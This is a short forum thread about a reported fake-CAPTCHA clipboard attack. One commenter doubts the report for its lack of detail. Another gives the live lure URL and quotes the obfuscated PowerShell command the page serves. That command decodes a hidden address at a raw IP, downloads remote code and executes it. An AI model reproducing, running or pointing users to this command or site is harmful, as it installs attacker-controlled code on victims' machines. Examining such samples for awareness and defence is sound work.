• Onno (VK6FLAB)@lemmy.radio
    link
    fedilink
    English
    arrow-up
    34
    ·
    edit-2
    7 hours ago

    This article doesn’t at all explain what actually happens. There’s a hand wavey description including PowerShell scripts and the clipboard, but it doesn’t indicate how the code gets executed.

    The article talks about a complex and sophisticated attack, but I don’t see any evidence of that assertion.

    Also, given that it’s talking about PowerShell, I’m going to guess that this affects Windows only.

    Finally, there’s no source links, no CVE allocation, no indication what the URL looks like.

    I’m going with deep scepticism about this report unless more information comes to hand.

  • Object@sh.itjust.works
    link
    fedilink
    English
    arrow-up
    6
    arrow-down
    1
    ·
    edit-2
    7 hours ago

    For those who want to see it in action:

    https://dex-redirect.com/

    It gives you the following script:

    powershell -NoExit -c “$znn=‘sggk://91.212.166.104/e/2e’;$djq=$znn.ToCharArray()|%{if($_ -cmatch ‘[a-z]’){[char](122 - ([int][char]$_ - 97))}else{$_}};$jgq=($djq -join ‘’);([ScriptBlock]::Create((Invoke-RestMethod $jgq))).Invoke();”

    I can’t check what the CAPTCHA prompt says since I’m on mobile, but I’m guessing it asks you to paste it into your console.